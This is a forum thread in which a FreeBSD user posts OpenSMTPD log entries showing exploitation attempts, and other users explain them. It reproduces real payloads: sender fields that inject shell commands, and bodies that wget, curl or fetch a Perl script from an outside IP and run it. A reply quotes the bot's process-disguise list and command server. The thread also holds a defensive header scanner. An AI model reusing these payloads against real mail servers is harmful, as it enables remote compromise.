# SMTPD hack attempt?



## toorski (Feb 27, 2020)

In my *11.3 FreeBSD* jail with *OpenSMTPD* I found the following email message and output in the daily log, as follows:


```
Checking for rejected mail:

-- End of daily output --

From //80.82.223.34/.jet3;perl .jet3';@mydomain.com Wed Feb 19 04:17:37 2020
Return-Path: <//80.82.223.34/.jet3;perl .jet3';@mydomain.com>
Delivered-To: root@mydomain.com
Received: from x (163.53.207.186 [163.53.207.186])
    by mydomain.com (OpenSMTPD) with SMTP id beaa7283
    for <root@mydomain.com>;
    Wed, 19 Feb 2020 04:17:36 -0800 (PST)
Date: Wed, 19 Feb 2020 04:17:37 -0800 (PST)
Message-Id: <54cb8ee6e8598fb3@mydomain.com>

xxx

From ;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;@mydomain.com Wed Feb 19 04:25:10 2020
Return-Path: <;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;@mydomain.com>
Delivered-To: root@mydomain.com
Received: from x (sps-technoscreen.com [80.82.223.34])
    by mydomain.com (OpenSMTPD) with SMTP id 011db50b
    for <root@mydomain.com>;
    Wed, 19 Feb 2020 04:25:10 -0800 (PST)
Date: Wed, 19 Feb 2020 04:25:10 -0800 (PST)
Message-Id: <54cb8ef061c6b0b1@mydomain.com>

#0
#1
#2
#3
#4
#5
#6
#7
#8
#9
#a
#b
#c
#d
cd /tmp;wget http://80.82.223.34/.smt6;curl -O http://80.82.223.34/.smt6;fetch -o /tmp/.smt6 http://80.82.223.34/.smt6;perl .smt6;rm -rf .smt*


From ;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;@mydomain.com Wed Feb 19 08:03:50 2020
Return-Path: <;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;@mydomain.com>
Delivered-To: root@mydomain.com
Received: from x (FO111-51.bistrita.astral.ro [85.186.111.51])
    by mydomain.com (OpenSMTPD) with SMTP id 80f0bb45
    for <root@mydomain.com>;
    Wed, 19 Feb 2020 08:03:50 -0800 (PST)
Date: Wed, 19 Feb 2020 08:03:50 -0800 (PST)
Message-Id: <54cb8f12664a434c@mydomain.com>

#0
#1
#2
#3
#4
#5
#6
#7
#8
#9
#a
#b
#c
#d
cd /tmp;wget 80.82.223.34/.smt7;perl .smt7;rm -rf .smt7


From ;dig njuZqIOS.yxpidy.log.ihack.xyz;@mydomain.com Thu Feb 20 01:54:38 2020
Return-Path: <;dig njuZqIOS.yxpidy.log.ihack.xyz;@mydomain.com>
Delivered-To: root@mydomain.com
Received: from x (14.27.37.35 [14.27.37.35])
    by mydomain.com (OpenSMTPD) with SMTP id 836df4fe
    for <root@mydomain.com>;
    Thu, 20 Feb 2020 01:54:38 -0800 (PST)
Date: Thu, 20 Feb 2020 01:54:38 -0800 (PST)
Message-Id: <54cb8f4c0cc57c3b@mydomain.com>

xxx
```

What was that supposed to accomplish?

*Note:*
_My actual domain name was replaced by me with "mydomain.com"_


----------



## Lamia (Feb 27, 2020)

Well, ur

It's an attempt to see if your system will run a remote script/instructions, hence the commands - wget and the like.


----------
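A defender-side check for the pattern in the log above, as an added example that is not part of the original thread: it scans mbox text for `Return-Path` local parts containing shell metacharacters and reports the relay IP and the SMTP id from the `Received` header for each hit. The character set, the name `scan_mbox` and the benign control message are assumptions of this example.

```python
import re

# Shell-active characters. Some (| & ` $) are legal in an RFC 5321 local part
# but rare in real senders, so treat a hit as a lead to review, not a verdict.
SHELL_META = set(";|&`$()<>\\\" \t")
RETURN_PATH = re.compile(r"^Return-Path:\s*<(.*)>\s*$")
RELAY_IP = re.compile(r"^Received: from \S+ \(.*\[([0-9A-Fa-f.:]+)\]\)")
SMTP_ID = re.compile(r"\(OpenSMTPD\) with E?SMTP id (\w+)")

# Headers abridged from the daily output quoted in the thread, plus one
# constructed benign message (example.org, 192.0.2.10) as a control.
SAMPLE = """\
Return-Path: <//80.82.223.34/.jet3;perl .jet3';@mydomain.com>
Received: from x (163.53.207.186 [163.53.207.186])
    by mydomain.com (OpenSMTPD) with SMTP id beaa7283

Return-Path: <alice@example.org>
Received: from mail.example.org (mail.example.org [192.0.2.10])
    by mydomain.com (OpenSMTPD) with ESMTP id 0a1b2c3d

Return-Path: <;dig njuZqIOS.yxpidy.log.ihack.xyz;@mydomain.com>
Received: from x (14.27.37.35 [14.27.37.35])
    by mydomain.com (OpenSMTPD) with SMTP id 836df4fe
"""

def scan_mbox(text):
    """Return one dict per message whose envelope sender looks like shell."""
    findings, current = [], None
    for line in text.splitlines():
        m = RETURN_PATH.match(line)
        if m:
            local = m.group(1).rsplit("@", 1)[0]
            meta = sorted(SHELL_META & set(local))
            current = {"sender": m.group(1), "meta": meta,
                       "relay": None, "smtp_id": None} if meta else None
            if current:
                findings.append(current)
        elif current and not line.strip():
            current = None            # blank line: headers are over
        elif current:
            ip, sid = RELAY_IP.match(line), SMTP_ID.search(line)
            if ip and not current["relay"]:      # keep the top-most hop only
                current["relay"] = ip.group(1)
            if sid and not current["smtp_id"]:
                current["smtp_id"] = sid.group(1)
    return findings

if __name__ == "__main__":
    for f in scan_mbox(SAMPLE):
        print(f["relay"], f["smtp_id"], f["meta"], repr(f["sender"]))
```

The SMTP id it reports can be used to find the matching session in the mail log.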



## toorski (Feb 27, 2020)

Lamia said:


> Well, ur
> 
> It's an attempt to see if your system will run a remote script/instructions, hence the commands - wget and the like.



Yep, it seems so 

This is in my 11.3 jail netstat:


```
# netstat -a
Some tcp sockets may have been deleted.
Some udp sockets may have been deleted.
Some ip sockets may have been created or deleted.
Some icmp sockets may have been created or deleted.
Some igmp sockets may have been created or deleted.
Some pim sockets may have been created or deleted.
Some ip6 sockets may have been created or deleted.
Some icmp6 sockets may have been created or deleted.
Active UNIX domain sockets
Address          Type   Recv-Q Send-Q            Inode             Conn             Refs          Nextref Addr
               0 #0          0      0             4374                0                0                0
               0 #0          0      0             4373                0                0                0
               0 #0          0      0             4372                0                0                0
Bus error
```

What do I do now?

Tho, my 12.1 host's netstat looks normal


----------



## Lamia (Feb 27, 2020)

The hacker might have left a footprint - IP address. Block it.
If you have a greylist for email brute force, for tcp/udp connection tracking, etc. in place, you should be fine after blocking it. That's why milters like greylist, antivirus, amavis, etc. are recommended.


----------



## SirDice (Feb 27, 2020)

Grabbed that perl script, just for giggles. Oddly enough that .smt6 file was already removed, the .jet3 file however was not. And it turns out to be a slightly modified version of a common IRC bot. Note that this script will not open a listening port, so you're not going to see it with `netstat -a`. It also tries to hide its presence by changing the process name:

```
my @rps = ("/usr/local/apache/bin/httpd -DSSL",
           "/usr/sbin/httpd -k start -DSSL",
           "/usr/sbin/httpd",
           "/usr/sbin/sshd -i",
           "/usr/sbin/sshd",
           "/usr/sbin/sshd -D",
           "/usr/sbin/apache2 -k start",
           "/sbin/syslogd",
           "/sbin/klogd -c 1 -x -x",
           "/usr/sbin/acpid",
           "/usr/sbin/cron");
```

This particular script connects to 212.24.105.253 on port 80:

```
my $servidor="212.24.105.253";
my $ircname =("linux");
my $realname = ("linux");
my $porta='80';
```

There's usually an IRC service running there but I didn't check it. Before you go all gung-ho on those IP addresses, they're just ignorant users that got their server hacked by a similar bot.


----------



## toorski (Feb 27, 2020)

This is the first time that I see anything about opensmtpd in my daily security run output:

```
Checking for packages with security vulnerabilities:
Database fetched: Wed Feb 26 03:34:28 PST 2020
py36-urllib3-1.22,1
opensmtpd-5.9.2p1_7,1
python27-2.7.17_1: Tag: expiration_date Value: 2020-12-31
python27-2.7.17_1: Tag: deprecated Value: EOLed upstream
```

I guess it's time for me to switch to exim. Then I can just run exim in a 12.1 jail with the 12.1 host, instead of running opensmtpd in an 11.3 jail with the 12.1 host, as I'm doing now, because opensmtpd doesn't support openssl 1.1*


----------



## toorski (Feb 27, 2020)

SirDice said:


> Grabbed that perl script, just for giggles



I'll play with those scripts, so maybe I'll learn something. Then I'll start hacking the modderhackers


----------

